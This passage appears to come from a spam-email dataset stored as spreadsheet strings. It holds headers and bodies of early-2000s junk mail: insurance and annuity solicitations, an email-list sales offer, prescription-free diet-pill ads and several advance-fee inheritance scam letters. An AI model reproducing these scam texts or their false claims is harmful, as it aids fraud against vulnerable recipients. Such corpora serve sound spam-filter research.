the form below which will direct you to the post card and how to make it work for you.     First Name:	  	 	 Last Name:	  	Note that when you press the "Send Information" button the screen may not change, but we will still receive your information and get back to you. Another way to order our sample presentation is to visit our website at [URL]www.gsladvisory.com[/URL]  .	  E-Mail:	  	 Phone#:	  	     These materials are for "agent use only." You should be a practicing, licensed and appointed annuity agent.	  We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insurancemail.net[/URL]   Legal Notice    ------=_NextPart_000_5B81AF_01C20D87.4EEF5910 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Ground breaking post card creates annuity leads =20     =20        =20            =20            =20           =20              =20            =20             Every senior wants to hear about the roth = conversion if=20               you can eliminate the up front tax cost. You can with = the new=20               and improved roth conversion program from GSL = Advisory.  The cheapest and most successful way to generate roth = conversion=20               program leads is to send postcards while also placing an = ad in the=20               small local paper. Repeat the ads and the postcard mailing = at least=20               6 different times. The one truth in advertising is that repetition = works. Even=20               the smallest and most unassuming ad works if it is seen = several=20               times. See if you can find an area that has its own zip = code and=20               a local paper serving that area. Some retirement = communities have=20               both a newspaper and their own zip code. This is your gold = mine. To see the postcard and ad and to learn how to work the = system,=20               complete the form below which will direct you to the post = card and=20               how to make it work for you.                 =20            =              =20                   First Name: =20                      =20                      =20                   Last Name: =20                      Note that=20                     when you press the "Send Information" = button the=20                     screen may not change, but we will still receive = your information=20                     and get back to you. Another way to order our sample = presentation=20                     is to visit our website at [URL]www.gsladvisory.com[/URL]&lt;= /font&gt; =20                   E-Mail: =20                      =20                   Phone#: =20                                  These materials are for "agent use only." You = should be=20             a practicing, licensed and appointed annuity = agent.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5B81AF_01C20D87.4EEF5910--</t>
  </si>
  <si>
    <t>www.gsladvisory.com http://www.Insurancemail.net www.gsladvisory.com http://www.Insurancemail.net</t>
  </si>
  <si>
    <t>5105</t>
  </si>
  <si>
    <t>To: webmaster@efi.ie\nFrom: &lt;Promotions@ebay.com&gt;\nDate: Thu, 6 Jun 2002 16:38:06</t>
  </si>
  <si>
    <t>Thu, 6 Jun 2002 16:38:06</t>
  </si>
  <si>
    <t>&lt;Promotions@ebay.com&gt;</t>
  </si>
  <si>
    <t>Our magazine promotion</t>
  </si>
  <si>
    <t>bizmagoffer Knowledge Is Power! So Get Yours At A Savings Up To 78% On The Top Informative Business Magazines               Any             3 Magazine $50      DETAILS Small Price To             Pay For The Business Edge               All             6 Magazine $99  DETAILS An Enormous Selection of         Magazines to choose from...         Always a deal... in addition to our daily specials come         check us out at [URL]www.wwwmagazine.com[/URL] Click here to close    this window Note: this is not a spam      email. This email was sent to you because your email was entered in on a website           requesting to be a registered subscriber. If you would would like to be removed      from our list, abuse@global2000.comCLICK    HERE TO CANCEL YOUR ACCOUNT and you will *never* receive another    email from us!</t>
  </si>
  <si>
    <t>www.wwwmagazine.com</t>
  </si>
  <si>
    <t>5094</t>
  </si>
  <si>
    <t>To: optin@dogma.slashnull.org\nFrom: Get Xenical &lt;get.xenical@mail.com&gt;\nDate: Thu, 6 Jun 2002 12:18:40 +1200</t>
  </si>
  <si>
    <t>Thu, 6 Jun 2002 12:18:40 +1200</t>
  </si>
  <si>
    <t>Get Xenical &lt;get.xenical@mail.com&gt;</t>
  </si>
  <si>
    <t>optin@dogma.slashnull.org</t>
  </si>
  <si>
    <t>Feeling fat?</t>
  </si>
  <si>
    <t>If anyone has called you names because you're overweight,\nor you are looking to make a positive change in your life,\nthen you can do something now!\n\nClick here to find out how\n[URL]http://4xenical.com[/URL]\n\n\n\n_______________________________________________\nWe hope you enjoyed receiving this email, but if you no longer\nwish to receive our emails click on the link below and you will\nnot hear from us again  - we guarantee it!\n\n[URL]http://4xenical.com[/URL]\n\n\n\n\nmvuyrbjoefexbxbqnxqafujbgnn</t>
  </si>
  <si>
    <t>http://4xenical.com http://4xenical.com</t>
  </si>
  <si>
    <t>5100</t>
  </si>
  <si>
    <t>To: webmaster@efi.ie\nFrom: "Brewster Curry"&lt;GenuineLogHome@yahoo.com&gt;\nDate: Thu, 6 Jun 2002 02:00:31 -0400</t>
  </si>
  <si>
    <t>Thu, 6 Jun 2002 02:00:31 -0400</t>
  </si>
  <si>
    <t>"Brewster Curry"&lt;GenuineLogHome@yahoo.com&gt;</t>
  </si>
  <si>
    <t>There is a Genuine Log Home in YOUR Future...</t>
  </si>
  <si>
    <t>There is a Genuine Log Home in Your Future!\n\n\nWestern Red Cedar\nLog Siding\nBasic Kits\nBuilder Kits\nPrecut Kits\nCustom Designs\nCustom Kits\n\nAll Types of Log Styles\n\nWe feel you will find our log home superior to any others on the market and our price structure competitive with other, less desirable housing.\n\nRemember that a home is a major investment and the focal point of family use. You deserve the best home possible for the amount of money you spend.\n\nClick on the link below for a catalog on Genuine Log Homes &amp; Accessories.\n\n[URL]www.genuineloghome.com[/URL]\n\nSales Rep Code: BSAD24\n\n\nTo be removed from our mailing please send an email to: higher_learning1234@yahoo.com</t>
  </si>
  <si>
    <t>www.genuineloghome.com</t>
  </si>
  <si>
    <t>4301</t>
  </si>
  <si>
    <t>To: "" &lt;&gt;\nFrom: andromeda &lt;andromeda@yahoo.com&gt;\nDate: Thu, 5 Sep 2002 22:20:37 -0700</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 22:20:37 -0700</t>
  </si>
  <si>
    <t>andromeda &lt;andromeda@yahoo.com&gt;</t>
  </si>
  <si>
    <t>"" &lt;&gt;</t>
  </si>
  <si>
    <t>Attn:Targeted email addresses</t>
  </si>
  <si>
    <t>Targeted email marketing works!  There's no way around it.\nNo other medium let's you share your offer with more \npeople for less than the cost of a small classified ad.\n\nWe can supply valid targeted emails according \nto your requirements, which are compiled only on your order, such as region/country/field/keyword/ \noccupation/Domain Name (like AOL.com) etc.\n\n\n\nFree membership\nSignup today at [URL]http://61.151.247.41[/URL]\nLimited membership\n\n\n\nThis is a one time message, you will not be emailed again.</t>
  </si>
  <si>
    <t>http://61.151.247.41</t>
  </si>
  <si>
    <t>4303</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: "IQ  - AFM" &lt;afm@insiq.us&gt;\nDate: Thu, 5 Sep 2002 19:35:13 -0400</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 19:35:13 -0400</t>
  </si>
  <si>
    <t>"IQ  - AFM" &lt;afm@insiq.us&gt;</t>
  </si>
  <si>
    <t>Behind Every Elite Producer...</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_2505E5_01C254FA.FC480250 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: quoted-printable  Behind every elite producer...is an elite seminar system!=09  	 =09  =09  =09  Attention all independent registered representatives:  Our reps' business has grown dramatically in the last two years.  What's their hook?  Our exclusive seminar marketing system for seniors, combined with equity indexed and fixed annuities.=09  	Advanced equity indexed annuities and how registered reps position these products in their practice. (The EIA story is out =97 = with 8 years of great results).	=20  	Proven seminar marketing system (Hundreds of our reps are using this system to build their senior client base).	=20  	A simpler approach to increasing sales with our generic PowerPoint=AE EIA presentation, and "Should I Stay or Should I Go," Incomizer and Inflationizer sales ideas.	=20  	Real world scenarios that you can use to solve real world problems in today's environment.	=20  The bottom line:=0A= Your senior clients and prospects want you to call us today.  =09 Call us today for more information!  800-880-3072 - or - Please fill out the form below for more information	=20 Name:	 	  =09 E-mail:	 	=20 Phone:	 	=20 City:	 	 State:	 	=20  	    =09 =20  American Financial Marketing, Inc. We don't want anyone to receive our mailings who does not wish to receive them. This is a professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.insuranceiq.com[/URL] =20 Legal Notice =20 ------=_NextPart_000_2505E5_01C254FA.FC480250 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Behind Every Elite Producer... =20      =20            =20           =20              =20                  =20                  =20                  =20            =20                   =20                  =20                 =20                    =20                        Advanced equity indexed = annuities=20                         and how registered reps position these products = in their=20                         practice. (The EIA story is out — with 8 = years of=20                         great results). =20                        Proven seminar marketing = system (Hundreds=20                         of our reps are using this system to build their = senior=20                         client base). =20                        A simpler approach to = increasing sales=20                         with our generic PowerPoint® EIA = presentation, and=20                         "Should I Stay or Should I Go," Incomizer=20                         and Inflationizer sales ideas. =20                        Real world scenarios that = you can=20                         use to solve real world problems in today's = environment. =20                  =20                 =20                   Call us today for more = information!                     - or - =20                        =20                            =20                               Please fill = out the form below for more information =20                               Name: =20                               E-mail: =20                               Phone: =20                               City: State: =20                                 =20                                  =20      We don't = want anyone to receive our mailings who does not=20 			wish to receive them. This is a professional communication=20 			sent to insurance professionals. To be removed from this mailing=20 			list, DO NOT REPLY to this message. Instead, go here: =20 			[URL]http://www.insuranceiq.com[/URL] Legal Notice =20 =20 ------=_NextPart_000_2505E5_01C254FA.FC480250--</t>
  </si>
  <si>
    <t>4293</t>
  </si>
  <si>
    <t>To: &lt;zzzz4@spamassassin.taint.org&gt;\nFrom: km523876@caramail.com\nDate: Thu, 5 Sep 2002 08:42:34 +0100</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 08:42:34 +0100</t>
  </si>
  <si>
    <t>km523876@caramail.com</t>
  </si>
  <si>
    <t>!Gorgeous,Custom Websites - $349 Complete! (9009zRlD0-486vNhZ47@18)</t>
  </si>
  <si>
    <t>\n\n**Beautiful, 100% Custom Websites, $349 Complete!**  \n  \n---  \n  \n|\n\n|  |\n\n![]([URL]http://7x24.sunshinehui.com[/URL]\n\n|\n\n**Get a beautiful, 100% Custom Web Site ( _or yours redesigned_ )  _for only\n$349_!*  \n  \nWe have references coast to coast  \nand will give you _plenty of sites to view!_**  \n  \n---|---  \n  \n**Includes up to 7 pages (you can add more), java rollover buttons, feedback\nforms, more. It will be constructed to your taste and specifications. We do\nnot use templates,   _our sites are completely custom.  _   * _Must host with\nus @ $19.95/mo (100 Megs, 20 Email accounts, Control Panel, Front Page,\nGraphical Statistics, more).  \n_**  \n  **_For sites to view, complete below or call our message center at\n    321-726-2209 (24 hours). Your call will be returned promptly._  \n  \n** ** _NOTE:    If you are using a web based email program (such as Yahoo,\nHotmail, etc.) the form below will not work._  Instead of using the form,\n_CLICK HERE_ .**\n\n    Name: Phone w/AC*:State:   \nType Project: ___New Site: Redesign Flash Intro/banner_   Current site?:  \nComments:  \n  \n  \n  \nIf you do not wish to receive our messages, **_CLICK HERE   (Please enter ALL\nemail addresses (in the body of the message) you wish to have eliminated from\nfuture mailings.\n\n_**  \n  \n[3423HzRl2-702DvNh8963ZrLd3-312VpIa7473UmEw3-824QiA@47]\n\n</t>
  </si>
  <si>
    <t>5782</t>
  </si>
  <si>
    <t>To: nan\nFrom: "Astarte Turizm" &lt;astarte@veezy.com&gt;\nDate: Thu, 31 Oct 2002 16:01:32 +0200</t>
  </si>
  <si>
    <t>Thu, 31 Oct 2002 16:01:32 +0200</t>
  </si>
  <si>
    <t>"Astarte Turizm" &lt;astarte@veezy.com&gt;</t>
  </si>
  <si>
    <t>[WM] (no subject)</t>
  </si>
  <si>
    <t>Dear our Guests,\n\nEXPLORE TURKEY WITH ASTARTETOURS!!\n	\nHotel Reservations: \nYou will find more than 200 hotels all over Turkey, which have been carefully selected.\nThrough our reservation system we are able to book more than 1.000 hotels arround Europe.\n \nTours \nHosted Programs, sightseeing tours, escorted tours or cruise programs.\nWe have tours on set dates each year or we can organize special itineraries for the independant traveller or small groups!!\n \n\nRent-A-Car:\nTravelling on your own pace in Turkey! We have a range of vehicles on offer to choose from. They may be hired in all major cities. \nYour car can be made available at the airport or your hotel for collection!!\n\nVisit our web-site!!\n\n[URL]www.astartetours.com[/URL]\n\nKind Regards\nAstarte Tours\n\nP.S.: If you want to unsubscribe, please sent us an e-mail.\n\n\n\n\n-------------------------------------------------------\nThis SF.net email is sponsored by: Get the new Palm Tungsten T \nhandheld. Power &amp; Color in a compact size! \n[URL]http://ads.sourceforge.net[/URL]\n_______________________________________________\nwebmake-talk mailing list\nwebmake-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>www.astartetours.com http://ads.sourceforge.net https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>1235</t>
  </si>
  <si>
    <t>To: nan\nFrom: JOHNBRUNO2 &lt;JOHNBRUNO2@terra.es&gt;\nDate: Thu, 31 Mar 2005 09:49:37 -0800</t>
  </si>
  <si>
    <t>Thu, 31 Mar 2005 09:49:37 -0800</t>
  </si>
  <si>
    <t>JOHNBRUNO2 &lt;JOHNBRUNO2@terra.es&gt;</t>
  </si>
  <si>
    <t>YOUR POSITIVE RESPONSE IS NEEDED</t>
  </si>
  <si>
    <t>\n\nDear Friend,\n\nTREAT WITH UTMOST SECRECY AND CONFIDENTIALITY\n\nMy name is John Bruno; I worked in a bank here in the United Kingdom. \nI am contactingyou of a business transaction, of a huge sum of money \nfrom A deceased client of mine.Though I know that a transaction of \nthis magnitude Will make any one apprehensive and worried, butI am \nassuring you that everything has been taken care off, and all will\nbe well at the end Of the day. I decided to contact you due to the \nurgency of thistransaction.\n\nFACT:\n\nI was the account officer of a foreigner named Gerald Welsh who died \nin an air crash along with his wife on The 31st October 1999 in an \nEgyptian airline 990 with Otherpassengers on board. You can confirm \nthis from The website below which was published by \nCNN.WEBSITE.[URL]http://news.bbc.co.uk[/URL] since \nhis death,none of his next-of-kin are alive to Make claims for this \nmonies as his heir, because they all died in the same accident himself \nand his wife (May Their soul rest in peace). We could not release the \nfunds from his account unless someone applied for claim as The next-of-\nkin to the deceased .At that period he had $14,210,045m(fourteen \nMillion two hundred and ten thousand dollars) in his account. After \nfour to five years the money was called back to the bank treasury as \nunclaimed bills and the money shared amongst the directors of the \nbank, which has already been done by the directors mid last year.\n\nPROPOSITION;\nDue to the relationship between i and the deceased (Gerald Welsh) he \ntold me of a diamond business which he had to do and left me in care \nof the CERTIFICATE OF DEPOSIT which he used to lodge the funds in a \nsecurity company in Europe which is to the tune of $8.4m(eight million \nFour hundred thousand dollars).\n\nNote: that I decided to seek for whom his/her name shallbe used as the \nnext of kin/beneficiary to claim the funds at the security company \nrather than allow the funds to lay unclaimed. It may interest you to \nknow that i have secured from the probate an order of mandamus to \nlocate any of the deceased beneficiaries again and no one was found.\n \nPlease acknowledge receipt of this message in acceptance of our mutual \nbusiness endeavor by furnishing me with the following information if \nyou are interested.\n\n1.Full name in order for me to prepare the Document in your name.\n\n2. Direct Telephone and fax numbers for our personal Contact and\nMutual trust in each other.\n\nI shall be compensating you with 20% percent of the Whole funds on \nfinal conclusionof this project for your assistance, while the balance \nshall be for me for investment Purposes. Because I just retired. If \nthis proposal is Acceptable by you, please endeavor to contact me \nimmediately. Do not take undue advantage of the trust I have bestowed \nin you.\n\nI await your urgent mail.\n\nRegards,\nJohn Bruno.\n\n\n\n\n \n\n\n\n\n</t>
  </si>
  <si>
    <t>1233</t>
  </si>
  <si>
    <t>To: R@M\nFrom: Ata Yusuf &lt;atayusuf@parsnet-co.com&gt;\nDate: Thu, 31 Mar 2005 04:13:04 +0100</t>
  </si>
  <si>
    <t>Thu, 31 Mar 2005 04:13:04 +0100</t>
  </si>
  <si>
    <t>Ata Yusuf &lt;atayusuf@parsnet-co.com&gt;</t>
  </si>
  <si>
    <t>Message from Ata, pls give me a hand.</t>
  </si>
  <si>
    <t>Dear Friend,\nI am Ata Yusuf 24 years of age, from Darfur, Sudan, the only surviving Son of the family of Ibrahim Yusuf who was a civil engineer before his death in May 21, 2004 as a result of the crisis in Darfur, Western Sudan. You can read more about the crisis in Dafur, Sudan by click on this weblink; [URL]http://www.savedarfur.org[/URL] This unforgettable incident claimed the lives of my parents while my sisters and I were in school, as such we have been in a refugee camp since the death of our parents before a kind hearted woman took me to London, Uk where I have currently seek asylum. As such I am in great need of help now because I need to move my sisters out of the refugee camp back home in Sudan, to settle down with me here in London. \n\nI am writing you now because I need you to help me claim the funds my father deposited in a security and finance company in Amsterdam, Netherlands. He deposited the sum of $3.8million us dollars (three million and eight hundred thousand united states dollars) in this security and finance company which I discovered shortly before leaving my country for Uk. I have the relevant document that will be require for the claim of the funds but my problem now is that I am not in the position to handle such huge amount of money here because of my immigration status. It might interest you to know that I have already establish communication with the security company to claim the funds as the heir of my family, unfortunately that is just all I can do by myself for now. As a result, In a nut shell i need you to help me remit the funds from the security company on my behalf, I am sure it will not take too much of your time because I have everything that will facilitate the quick release of the funds to you.\n\nI am counting on you to help me in most sincerity and not to take undue advantage of my present situation as I will be basically entrusting you with these funds. Once you get the funds, you have to send me some money that will be enough for my sisters to arrange for their traveling documents to come over to London to join me. \n\nFinally, I will need you to invest the rest funds in a profitable partnership business venture in your country, we will discuss our partnership terms when we arrange to meet after the completion of this transfer.\n\nI hope to hear from you soon, my regards to your family.\n\nBest Regards,\nAta Yusuf.\n\n\n</t>
  </si>
  <si>
    <t>http://www.savedarfur.org</t>
  </si>
  <si>
    <t>To: akyari1@sudanmail.net.sd\nFrom: Abu Kyari. &lt;akyari1@sudanmail.net.sd&gt;\nDate: Thu, 31 Jul 2003 09:38:14 +0300</t>
  </si>
  <si>
    <t>Thu, 31 Jul 2003 09:38:14 +0300</t>
  </si>
  <si>
    <t>Abu Kyari. &lt;akyari1@sudanmail.net.sd&gt;</t>
  </si>
  <si>
    <t>akyari1@sudanmail.net.sd</t>
  </si>
  <si>
    <t>Re: Please confirm receipt.</t>
  </si>
  <si>
    <t>Greetings and Compliments.\n\nI have gotten your contact from the internet, listed as a \nprofessional \nwhom I might be able to transact with, and this makes me \nfeel I may \nmake a sincere proposition to you, and I have decided to \nmake this preposition to you in good faith, which relates \nto a realistic and genuinely simplistic business opening \nthat needs the participation of a person with your \nexpertise, and ingenuity and a clear indication to\ntrustworthiness and sincerity.\n\nI am a lawyer residing and practicing in Nigeria as you \nmay need to know and I represent the interest of a client \nwho is a Brother as well who has made an offer to me which \nis most lucrative, my correspondence with you from hence \nis dictated by the need for us to get the participation of \na neutral foreigner who will assist us perfect the \ntransaction.\n\nMy client was a prominent figure in the Military Politics \nand rule of \nmy country for about ten years and he has had complicity \nin a few economic scandals and a host of litigations too \nhe has had a lot of his physical and monetary assets \nseized by the Nigerian Government who consider him as a \npart of the corrupt machinery of the then Military \nGovernment. Now he has a substantial amount deposited in a \nbank in Nigeria (US$ 25.M.) and he is very scared that \nthis account will be discovered because similar accounts \nin Switzerland and England were previously discovered and \nfrozen by the governments of those countries in \ncollaboration with the Government of Nigeria.\n\nPrecisely, my client's family returned US$ 1B. to the \ngovernment of Nigeria in 2002 under the direction of the \nSwiss banking authorities, this is a confirmable matter, \neven as the existence of the fund mentioned above is \nconfirmable. \n\nNow it is his intention to migrate with his family out of \nNigeria \ntowards the Middle East and he depends so much on this \nfund, thus he is\nlooking for a reliable and trustworthy person who will \nreceive the money\ndiscreetly and then transfer the money at a latter date to \na neutral account to be established in Lebanon when he \nfinally succeeds with his emigration plan.\n\nIf you accept my proposition and agree to participate in \nthis \ntransaction, you will in no case whatsoever undertake \nrisk- expend \nmoney or execute any unreasonable task- whereas you will \nbe well remunerated, in principle you will receive 10% of \nthe amount transferred to you once the transaction is \ncompleted.\n\nApart from this there is another sum of Money, held up in \na Security \nCompany (In Cash), the Money was earmarked for the support \nof the cause of Charity in India, but it was never \nretrieved before the demise \nof my clients father, now my client also wants to retrieve \nthis money in addition to the money with the bank in \nNigeria. The money with the Security Company is Thirty one \nMillion American Dollars in one hundred dollar bills.\n\nSince I do not know in what vein you will take this \nmissive I have kept \nthe information peripheral, I will be posited to give \nfurther information upon your acceptance and will also \nintroduce you to my client eventually.  I hope I will be \nable to work with you earnestly unto our joint success.\n\nI await your response eagerly.\n\nRespectfully.\n\nAbu Kyari esquire.\nWelcome to Sudan pioneer ISP\n[URL]http://www.sudanet.net[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://www.sudanet.net</t>
  </si>
  <si>
    <t>439</t>
  </si>
  <si>
    <t>To: R@M\nFrom: DR Peter Clapton &lt;wasa@was.com&gt;\nDate: Thu, 30 Oct 2003 16:55:48 -0800</t>
  </si>
  <si>
    <t>Thu, 30 Oct 2003 16:55:48 -0800</t>
  </si>
  <si>
    <t>DR Peter Clapton &lt;wasa@was.com&gt;</t>
  </si>
  <si>
    <t>mail me</t>
  </si>
  <si>
    <t>From: The Desk of Dr.PETER CLAPTON\nDirector, Investments and Portfolio Management,\nRoyal Accounting and Trust LLC,\nSwitzerland.\nTel: 41 79 530 99 35\n \n \nDear Sir/Madam,\n \nI am the expert director heading Investments and Portfolio Management in the above-mentioned firm in Switerland.\n \nI am contacting you in view of an urgent assistance to carry out a pending transaction, which will develop a cordial business relationship between you and me. One of my clients whom I have personally managed his portfolio for 10 years now was a victim of a fatal car crash. His name is Late Mr Saud Ed Abad AlKharj, he was survived by a fiance and a two-year-old son from her as they intended getting married but where trying to be cautious because of Islamic law attitude on adultery. This were his only family and no next of kin, as he was the only child of Late Sheikh Hamza Al Kharj Al Faisal, who received royalties from the Kuwaiti Government on one of his fields which oil was discovered and subsequently explored (the Al Jazriah Oil Field).\n \nAll subsequent investigation to find a next of kin was privately conducted by me and was futile. It was at this juncture that I and other officials Managing his portfolio and 2 bank managers where he had his accounts now \ndecided to make this proposal and transfer ownership of the portfolio to an Agreeing party as beneficiary to the portfolio of the deceased.\n \nThe reason why ownership cannot be transferred to his wife to be and only son is that Islamic law will not recognize such and if an attempt is made on that it may put her in trouble with the authorities for giving birth outside \nmarriage. So we have decided to help her by making this proposal and making sure she gets a substantial part of Late Mr Saud Alkharjs property for her \nand her son.\n \nYou must be asking where I got your mail address, it was made available to me by a junior director Mrs Cynthia Philips in charge of customer services on request for contacts for investment expansion for a client but she is not aware of this contact. All records and accounts regarding the assets of deceased were managed by me for 10 years running, if you are interested to assist us, all I will do is to incorporate in the old records recognizing \nyou as the only beneficiary.\n \nThe banking law here stipulates that if such portfolio remains unclaimed after four years it will go to the public department. The need for a foreigner as beneficiary is occasioned by the fact that the deceased was not \npermanently resident in Switzerland.\n \nFor your assistance, we made up of I, 2 senior directors in my firm and 2 bank managers in banks which the Kuwaiti Government pay royalties, accruing to the deceased have agreed in fairness to make available 25% of all bank \nfunds cleared and 15% of the royalties which you will continue to receive on behalf of the deceased as sole beneficiary every year. However we do not intend to share any interest with you as far as the estates and property are \nconcerned, as they will be going to the surviving wife and child.\n \nIf you are okay with the above explanations, you may reply us including all your contact telephone and fax numbers so that we may confirm you genuine, after which we will make more information available to you on how we will \nproceed.\n \nI must further assure you that this transaction is 100% legitimate and the modalities for this transaction is being handled by top executives which assure a risk free transaction.Kindly visit my firms website at [URL]www.royaltrust.com[/URL]\n \nWe await your timely response.\n \nBest Regards\n \nDR PETER CLAPTON\n</t>
  </si>
  <si>
    <t>www.royaltrust.com</t>
  </si>
  <si>
    <t>2753</t>
  </si>
  <si>
    <t>To: nan\nFrom: joseph koliga &lt;joseph.koliga108@hotmail.fr&gt;\nDate: Thu, 30 Nov 2006 11:07:03 +0100</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2006 11:07:03 +0100</t>
  </si>
  <si>
    <t>joseph koliga &lt;joseph.koliga108@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>From Joseph</t>
  </si>
  <si>
    <t>FROM MR JOSEPH KOLIGA\nABIDJAN,COTE D'IVOIRE\nWEST AFRICA.\nTEL.+225.06.41.74.06\n\nDear Friend,\n\nI am writting you this letter with due respect and heart full of tears, i \nneed your help. I got your name and contact from a trust-worthy person who \nassured me of your integrity and that you will help me to transfer this \nmoney,\n\nI am JOSEPH FORTUNE KOLIGA,the only Son of late Mr and Mrs ALFRED KOLIGA. My \nfather was a very rich and wealthy Gold Trader in Monrovia the Capital of \nRepublic of Liberia in West Africa.I want to let you know that my father was \npoisoned by his business associates while my mother died when i was very \nlittle and since then,my father took me so special because I am his only \nson. Before the death of my father on 2nd july 2006 in a hospital here in \ncote d'ivoire, he told me that he has the sum of $3.5 million ( Three \nMillion,Five Hondred Thousand u.s dollars ) which he deposited in a bank \nhere in Cote D'ivoire. He made this money from the sales of Gold, He also \ntold me that it was because of this money he was poisoned by his business \npatners while on a business trip with them and he instructed me to look for \na foreign partner who will help me transfer this money out of republic of \nCote Divoire and invest it for me, my purpose of contacting you is for you \nto help transfer this money to your country before this people who killed my \nfather will kill me.\n\nThis people who killed my father are after my life and they want to kill me \nand collect the money from me.That is why I'm now hiding my self here in \nRepublic of Cote Divoire so that they will not see me.Please, i need your \nurgent help.Tell me how much percentage you will take in the total money of \nthe Three Million, Five Hundred thousand usa Dollars to help me in \ntransfering this money to your bank; But you have to assure me that you will \nhelp me fully to transfer the money to your account . l hope you will not \nbetray the trust i have on you because this money is my only hope in this \nlife.And moreover, you will also help me to come over to your country were i \nwill settle down for my life and  invest this money for me. I can assure you \nthere is No regrate in helping me because, this money is an inheritance from \nmy late father.\n\nI  Await your reply,\nGreetings to you and your  Family\n\nFrom,\n\nJOSEPH KOLIGA\n\n_________________________________________________________________\nDécouvrez le blog Eragon sur Windows Live Spaces! \n[URL]http://eragon-heroic-fantasy.spaces.live.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://eragon-heroic-fantasy.spaces.live.com</t>
  </si>
  <si>
    <t>5027</t>
  </si>
  <si>
    <t>To: &lt;jfergie934@netnoir.net&gt;knoshaug.com, &lt;jazz23@netnoir.net&gt;knoshaug.com,\nFrom: sje726@aol.com ()\nDate: Thu, 30 May 2002 23:54:49 -0400</t>
  </si>
  <si>
    <t>Thu, 30 May 2002 23:54:49 -0400</t>
  </si>
  <si>
    <t>sje726@aol.com ()</t>
  </si>
  <si>
    <t>&lt;jfergie934@netnoir.net&gt;knoshaug.com, &lt;jazz23@netnoir.net&gt;knoshaug.com,</t>
  </si>
  <si>
    <t>The only medically proven way to lose weight... DHF84Z8F</t>
  </si>
  <si>
    <t>Below is the result of your feedback form.  It was submitted by\n (sje726@aol.com) on Thursday, May 30, 2002 at 23:54:48\n---------------------------------------------------------------------------\n\n.: \n\nLooking to lose some weight before summer hits?\n\nIntroducing Phentermine , the most popular weight loss drug in the world. \nOver 50% of doctors prescriptions for weight loss are for Phentermine , making it the most widely used prescription weight loss product in the nation. \n\nPhentermine  has been proven to keep cholesterol levels down, energy levels up, and most importantly help you lose pounds and inches in a relatively short period of time.\n\nBest of all, you don't need a prescription to order online!\nTakes only minutes to complete your order, and because you purchase online you pay NO doctors fees. All orders are shipped quickly and discreetly, and we now ship to all 50 states... click below for details!\n[URL]http://DDoHX@www.getphentermine.com[/URL]\n\n\n\n\n----------------------------------------------------------------------------------------------------------------\nIf you'd like to be removed from this mailing list, please simply click here [URL]www.deletemyrxmail.com[/URL]\n\n---------------------------------------------------------------------------</t>
  </si>
  <si>
    <t>http://DDoHX@www.getphentermine.com www.deletemyrxmail.com</t>
  </si>
  <si>
    <t>5026</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "IQ - VBI" &lt;vbi@insurancemail.net&gt;\nDate: Thu, 30 May 2002 22:51:38 -0400</t>
  </si>
  <si>
    <t>Thu, 30 May 2002 22:51:38 -0400</t>
  </si>
  <si>
    <t>"IQ - VBI" &lt;vbi@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>A Unique Dual Income Opportunity</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_40E492_01C20813.27572AA0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: quoted-printable  Life Insurance Settlements: A unique dual-income opportunity  =09 A Life Settlement is the sale of a life insurance policy=20 that gives the policy owner a significant cash settlement. =09  =09  Earn substantial referral fees=0A= Sell more product=0A= Renewal Commissions of Original Policy Stay Intact=0A= A Value-Add to Your Existing Business=09 DON'T CHANGE YOUR CURRENT WAY OF DOING BUSINESS Turn your existing book into an additional income stream=20 with very little effort. =09  =09 Please fill out the form below for more information	=20 Name:	  =09 E-mail:	  =09 Phone:	  =09 City:	  	State:	  	 =09  	  	 	   =09 =20 =20 Call or e-mail   us today!  800-871-9440 or visit us online at: [URL]www.Life-Settlements-Online.com[/URL] =20  =20 We don't want anybody to receive our mailings who does not wish to receive them. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insurancemail.net[/URL] =20 Legal Notice  =20 ------=_NextPart_000_40E492_01C20813.27572AA0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable A Unique Dual Income Opportunity =20     =20       =20        =20            =20                        A Life Settlement is = the sale of a life insurance policy              that gives the policy owner a significant cash = settlement. =20            =20            =20            DON'T CHANGE YOUR CURRENT WAY OF = DOING BUSINESS             Turn your existing book into an additional income = stream              with very little effort. =20            =20           =20              =20                  =20                      =20                         Please fill out the form below for more = information =20                         Name: =20                            =20                         E-mail: =20                            =20                         Phone: =20                            =20                         City: =20                            State: =20                            =20                           =20                              =20                                          Call or e-mail us = today!             or visit us online at: www.Life-Settlements-Onli= ne.com                =20     =20        We = don't want anybody=20         to receive our mailings who does not wish to receive them. This = is professional=20         communication sent to insurance professionals. To be removed = from this=20         mailing list, DO NOT REPLY to this message. Instead, go = here: =20         [URL]http://www.Insurancemail.net[/URL] Legal=20   Notice =20 ------=_NextPart_000_40E492_01C20813.27572AA0--</t>
  </si>
  <si>
    <t>www.Life-Settlements-Online.com http://www.Insurancemail.net http://www.Insurancemail.net</t>
  </si>
  <si>
    <t>5020</t>
  </si>
  <si>
